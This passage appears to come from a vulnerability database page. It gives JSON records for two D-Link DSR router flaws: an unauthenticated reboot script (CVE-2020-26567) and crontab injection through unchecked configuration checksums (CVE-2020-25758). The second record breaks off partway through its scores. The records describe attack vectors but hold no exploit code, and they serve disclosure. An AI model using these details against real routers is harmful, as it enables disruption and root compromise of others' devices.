Search criteria

8 vulnerabilities found for dsr-250n by dlink

VAR-202010-0522

Vulnerability from variot - Updated: 2024-02-13 01:54

An issue was discovered on D-Link DSR-250N before 3.17B devices. The CGI script upgradeStatusReboot.cgi can be accessed without authentication. Any access reboots the device, rendering it therefore unusable for several minutes. D-Link DSR-250N The device is vulnerable to a lack of authentication for critical features.Denial of service (DoS) It may be put into a state. D-Link DSR-250N is a unified service router produced by D-Link in Taiwan

Show details on source website

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202010-0522",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "dsr-250n",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17b"
      },
      {
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-250n",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "dsr-250n  firmware  3.17b  less than"
      },
      {
        "model": "dsr-250n \u003c3.17b",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-59763"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-012324"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-26567"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250n_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "3.17b",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-250n:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-26567"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Site redteam-pentesting.de",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202010-238"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2020-26567",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 4.9,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 4.9,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2020-26567",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 4.9,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "id": "CNVD-2020-59763",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 5.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 1.8,
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 5.5,
            "baseSeverity": "Medium",
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2020-26567",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "Low",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2020-26567",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2020-59763",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202010-238",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2020-26567",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-59763"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-26567"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-012324"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202010-238"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-26567"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An issue was discovered on D-Link DSR-250N before 3.17B devices. The CGI script upgradeStatusReboot.cgi can be accessed without authentication. Any access reboots the device, rendering it therefore unusable for several minutes. D-Link DSR-250N The device is vulnerable to a lack of authentication for critical features.Denial of service (DoS) It may be put into a state. D-Link DSR-250N is a unified service router produced by D-Link in Taiwan",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-26567"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-012324"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-59763"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-26567"
      }
    ],
    "trust": 2.25
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2020-26567",
        "trust": 3.1
      },
      {
        "db": "PACKETSTORM",
        "id": "159516",
        "trust": 2.5
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-012324",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-59763",
        "trust": 0.6
      },
      {
        "db": "EXPLOIT-DB",
        "id": "48863",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202010-238",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-26567",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-59763"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-26567"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-012324"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202010-238"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-26567"
      }
    ]
  },
  "id": "VAR-202010-0522",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-59763"
      }
    ],
    "trust": 0.06
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-59763"
      }
    ]
  },
  "last_update_date": "2024-02-13T01:54:57.841000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top\u00a0Page",
        "trust": 0.8,
        "url": "https://www.dlink.com/en/consumer"
      },
      {
        "title": "Patch for D-Link DSR-250N Denial of Service Vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/237802"
      },
      {
        "title": "D-Link DSR-250N Fixes for access control error vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=131105"
      },
      {
        "title": "SecBooks\nSecBooks\u76ee\u5f55",
        "trust": 0.1,
        "url": "https://github.com/sexybeast233/secbooks "
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-59763"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-26567"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-012324"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202010-238"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-306",
        "trust": 1.0
      },
      {
        "problemtype": "Lack of authentication for important features (CWE-306) [NVD Evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-012324"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-26567"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 3.2,
        "url": "http://packetstormsecurity.com/files/159516/d-link-dsr-250n-denial-of-service.html"
      },
      {
        "trust": 3.1,
        "url": "http://seclists.org/fulldisclosure/2020/oct/14"
      },
      {
        "trust": 1.7,
        "url": "https://www.redteam-pentesting.de/advisories/rt-sa-2020-002"
      },
      {
        "trust": 1.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26567"
      },
      {
        "trust": 0.8,
        "url": "https://www.redteam-pentesting.de/en/advisories/rt-sa-2020-002/-denial-of-service-in-d-link-dsr-250n"
      },
      {
        "trust": 0.6,
        "url": "https://www.exploit-db.com/exploits/48863"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/306.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/sexybeast233/secbooks"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-59763"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-26567"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-012324"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202010-238"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-26567"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-59763"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-26567"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-012324"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202010-238"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-26567"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-10-28T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2020-59763"
      },
      {
        "date": "2020-10-08T00:00:00",
        "db": "VULMON",
        "id": "CVE-2020-26567"
      },
      {
        "date": "2021-04-30T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-012324"
      },
      {
        "date": "2020-10-08T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202010-238"
      },
      {
        "date": "2020-10-08T13:15:11.233000",
        "db": "NVD",
        "id": "CVE-2020-26567"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-11-01T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2020-59763"
      },
      {
        "date": "2023-04-26T00:00:00",
        "db": "VULMON",
        "id": "CVE-2020-26567"
      },
      {
        "date": "2021-04-30T05:39:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-012324"
      },
      {
        "date": "2020-10-21T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202010-238"
      },
      {
        "date": "2023-04-26T19:27:52.350000",
        "db": "NVD",
        "id": "CVE-2020-26567"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202010-238"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link\u00a0DSR-250N\u00a0 Vulnerability regarding lack of authentication for critical features on the device",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-012324"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "access control error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202010-238"
      }
    ],
    "trust": 0.6
  }
}

VAR-202012-0332

Vulnerability from variot - Updated: 2023-12-18 12:16

An issue was discovered on D-Link DSR-250 3.17 devices. Insufficient validation of configuration file checksums could allow a remote, authenticated attacker to inject arbitrary crontab entries into saved configurations before uploading. These entries are executed as root. D-Link DSR-250 A device contains a vulnerability related to inadequate data integrity verification.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. D-Link DSR-250 is an 8-port Gigabit VPN router with dynamic Web content filtering.

D-Link DSR-250 3.17 has a command injection vulnerability. The vulnerability stems from insufficient verification of the configuration file checksum

Show details on source website

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202012-0332",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "dsr-1000ac",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-500",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-1000n",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-150",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-150n",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-250",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-1000",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-250n",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-500ac",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "*"
      },
      {
        "model": "dsr-250n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-1000",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-500n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-250",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-500",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-150n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-500ac",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-1000ac",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-1000n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-150",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-250",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "3.17"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-72722"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014725"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-25758"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-150_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "3.17",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-150:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-150n_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "3.17",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-150n:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "3.17",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-250:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250n_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "3.17",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-250n:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "3.17",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-500:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500n_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-500n:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500ac_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "3.17",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-500ac:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "3.17",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-1000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000n_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "3.17",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-1000n:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-1000ac_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "3.17",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-1000ac:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-25758"
      }
    ]
  },
  "cve": "CVE-2020-25758",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
